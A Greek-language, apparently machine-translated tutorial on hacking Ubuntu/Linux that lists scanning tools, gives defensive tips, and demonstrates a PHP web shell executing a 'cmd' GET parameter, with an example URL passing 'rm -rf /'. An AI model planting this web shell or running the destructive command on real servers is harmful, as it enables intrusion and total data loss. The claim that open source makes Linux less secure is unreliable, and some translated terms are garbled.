Hacking Linux OS: Hacking με Ubuntu (Οδηγός εντολών)

Το Linux είναι το πιο ευρέως χρησιμοποιούμενο λειτουργικό σύστημα διακομιστών, ειδικά για διακομιστές Ιστού. Είναι ανοιχτού κώδικα. Αυτό σημαίνει ότι οποιοσδήποτε μπορεί να έχει πρόσβαση στον πηγαίο κώδικα. Αυτό το καθιστά λιγότερο ασφαλές σε σύγκριση με άλλα λειτουργικά συστήματα, καθώς οι εισβολείς μπορούν να μελετήσουν τον πηγαίο κώδικα για να βρουν τρωτά σημεία. Linux for Hackers έχει να κάνει με την εκμετάλλευση αυτών των τρωτών σημείων για την απόκτηση μη εξουσιοδοτημένης πρόσβασης σε ένα σύστημα.

Σε αυτό το άρθρο, θα σας παρουσιάσουμε τι είναι το Linux, τα τρωτά σημεία ασφαλείας του, το hacking με Ubuntu και τα αντίμετρα που μπορείτε να εφαρμόσετε.

Γρήγορη σημείωση σε Linux

Το Linux είναι ένα λειτουργικό σύστημα ανοιχτού κώδικα. Υπάρχουν πολλές διανομές λειτουργικών συστημάτων που βασίζονται σε Linux όπως το Redhat, το Fedora και Ubuntu, κ.λπ. Σε αντίθεση με άλλα λειτουργικά συστήματα, το Linux είναι λιγότερο ασφαλές όσον αφορά την ασφάλεια. Αυτό οφείλεται στο γεγονός ότι ο πηγαίος κώδικας είναι διαθέσιμος ελεύθερα, επομένως είναι εύκολο να τον μελετήσετε για τρωτά σημεία και να τα εκμεταλλευτείτε σε σύγκριση με άλλα λειτουργικά συστήματα που δεν είναι ανοιχτού κώδικα. Το Linux μπορεί να χρησιμοποιηθεί ως λειτουργικό σύστημα διακομιστή, επιτραπέζιου υπολογιστή, tablet ή φορητής συσκευής.

Τα προγράμματα Linux μπορούν να λειτουργήσουν είτε με GUI είτε με εντολές. Οι εντολές Linux για Kali Linux Το hacking είναι πιο αποτελεσματικό και αποδοτικό σε σύγκριση με τη χρήση του GUI. Για το λόγο αυτό, βοηθάει να γνωρίζετε βασικές εντολές Linux για hacking.

Ανατρέξτε σε αυτά τα σεμινάρια https://www.guru99.com/unix-linux-tutorial.html για το πώς να ξεκινήσετε Kali Linux αμυχές.

Linux Hacking Tools

  • Nessus– αυτό το εργαλείο μπορεί να χρησιμοποιηθεί για Ubuntu hack, ρυθμίσεις διαμόρφωσης σάρωσης, ενημερώσεις κώδικα και δίκτυα κ.λπ. μπορείτε να βρείτε στο https://www.tenable.com/products/nessus
  • NMap. Αυτό το εργαλείο μπορεί να χρησιμοποιηθεί για την παρακολούθηση κεντρικών υπολογιστών που εκτελούνται στον διακομιστή και των υπηρεσιών που χρησιμοποιούν. Μπορεί επίσης να χρησιμοποιηθεί για σάρωση για θύρες. Μπορεί να βρεθεί στο https://nmap.org/
  • ΣΑΡΑ - SARA είναι το ακρωνύμιο του Security Auditor's Research Assistant. Όπως υποδηλώνει το όνομα, αυτό το εργαλείο μπορεί να χρησιμοποιηθεί για τον έλεγχο δικτύων έναντι απειλών όπως π.χ SQL Injection, XSS κ.λπ. μπορείτε να το βρείτε στο http://www-arc.com/sara/sara.html

Η παραπάνω λίστα δεν είναι εξαντλητική. σας δίνει μια ιδέα για τα διαθέσιμα εργαλεία Ubuntu hacking και hacking συστήματα Linux.

Πώς να αποτρέψετε τις παραβιάσεις του Linux

Το Linux Hacking εκμεταλλεύεται τα τρωτά σημεία του λειτουργικού συστήματος. Ένας οργανισμός μπορεί να υιοθετήσει την ακόλουθη πολιτική για να προστατευτεί από τέτοιες επιθέσεις.

  • Διαχείριση διακυμάνσεων– οι ενημερώσεις κώδικα διορθώνουν σφάλματα που εκμεταλλεύονται οι εισβολείς για να παραβιάσουν ένα σύστημα. Μια καλή πολιτική διαχείρισης ενημερώσεων κώδικα θα διασφαλίσει ότι εφαρμόζετε συνεχώς σχετικές ενημερώσεις κώδικα στο σύστημά σας.
  • Σωστή διαμόρφωση λειτουργικού συστήματος– άλλα exploit εκμεταλλεύονται τις αδυναμίες στη διαμόρφωση του διακομιστή. Τα ανενεργά ονόματα χρηστών και οι δαίμονες θα πρέπει να είναι απενεργοποιημένα. Οι προεπιλεγμένες ρυθμίσεις, όπως οι κοινοί κωδικοί πρόσβασης στην εφαρμογή, τα προεπιλεγμένα ονόματα χρήστη και ορισμένοι αριθμοί θυρών θα πρέπει να αλλάξουν.
  • Σύστημα ανίχνευσης εισβολής– τέτοια εργαλεία μπορούν να χρησιμοποιηθούν για τον εντοπισμό μη εξουσιοδοτημένης πρόσβασης στο σύστημα. Ορισμένα εργαλεία έχουν τη δυνατότητα να ανιχνεύουν και να αποτρέπουν τέτοιες επιθέσεις.

Δραστηριότητα Hacking: Hack a Ubuntu Σύστημα Linux με χρήση PHP

Σε αυτό το πρακτικό σενάριο, θα μάθουμε πώς να χακάρουμε Ubuntu και θα σας παρέχουμε βασικές πληροφορίες για το πώς μπορείτε να χρησιμοποιήσετε PHP για να θέσετε σε κίνδυνο ένα Linux. Δεν πρόκειται να στοχοποιήσουμε κανένα θύμα. Εάν θέλετε να το δοκιμάσετε, μπορείτε να εγκαταστήσετε το LAMPP στον τοπικό σας υπολογιστή.

Η PHP διαθέτει δύο λειτουργίες που μπορούν να χρησιμοποιηθούν για την εκτέλεση εντολών hacking Linux. Έχει συναρτήσεις exec() και shell_exec(). Η συνάρτηση exec() επιστρέφει την τελευταία γραμμή της εξόδου της εντολής ενώ η shell_exec() επιστρέφει ολόκληρο το αποτέλεσμα της εντολής ως συμβολοσειρά.

Για λόγους επίδειξης, ας υποθέσουμε ότι οι διαχειριστές εισβολέων ανεβάζουν το ακόλουθο αρχείο σε έναν διακομιστή ιστού.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

ΕΔΩ,

Το παραπάνω σενάριο λαμβάνει την εντολή από τη μεταβλητή GET με το όνομα cmd. Η εντολή εκτελείται χρησιμοποιώντας shell_exec() και τα αποτελέσματα επιστρέφονται στο πρόγραμμα περιήγησης.

Ο παραπάνω κώδικας μπορεί να αξιοποιηθεί χρησιμοποιώντας την ακόλουθη διεύθυνση URL

http://localhost/cp/konsole.php?cmd=ls%20-l

ΕΔΩ,

  • “…konsole.php?cmd=ls%20-l”εκχωρεί την τιμή ls –l στη μεταβλητή cmd.

Η εντολή σε Ubuntu για πειρατεία κατά του διακομιστή θα εκτελεστεί ως

shell_exec('ls -l') ;

Η εκτέλεση του παραπάνω κώδικα σε έναν διακομιστή ιστού δίνει αποτελέσματα παρόμοια με τα παρακάτω.

Χάκ α Ubuntu Σύστημα Linux με χρήση PHP

Η παραπάνω εντολή απλώς εμφανίζει τα αρχεία στον τρέχοντα κατάλογο και τα δικαιώματα

Ας υποθέσουμε ότι ο εισβολέας περνά την ακόλουθη εντολή

rm -rf /

ΕΔΩ,

  • Το "rm" αφαιρεί τα αρχεία
  • Το "rf" κάνει την εντολή rm να εκτελείται σε αναδρομική λειτουργία. Διαγραφή όλων των φακέλων και των αρχείων
  • Το "/" δίνει εντολή στην εντολή να ξεκινήσει η διαγραφή αρχείων από τον ριζικό κατάλογο

Το URL επίθεσης θα μοιάζει κάπως έτσι

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Σύνοψη

  • Το Linux είναι ένα δημοφιλές λειτουργικό σύστημα για διακομιστές, επιτραπέζιους υπολογιστές, tablet και κινητές συσκευές.
  • Linux είναι ανοιχτού κώδικα και ο πηγαίος κώδικας μπορεί να αποκτηθεί από οποιονδήποτε. Αυτό διευκολύνει τον εντοπισμό των τρωτών σημείων. Είναι ένα από τα καλύτερα λειτουργικά συστήματα για χάκερ.
  • Βασικές εντολές hacking και δικτύωσης σε Ubuntu είναι πολύτιμα για τους χάκερ Linux.
  • Τα τρωτά σημεία είναι μια αδυναμία που μπορεί να αξιοποιηθεί για να θέσει σε κίνδυνο ένα σύστημα.
  • Μια καλή ασφάλεια μπορεί να βοηθήσει στην προστασία ενός συστήματος από την παραβίαση από έναν εισβολέα.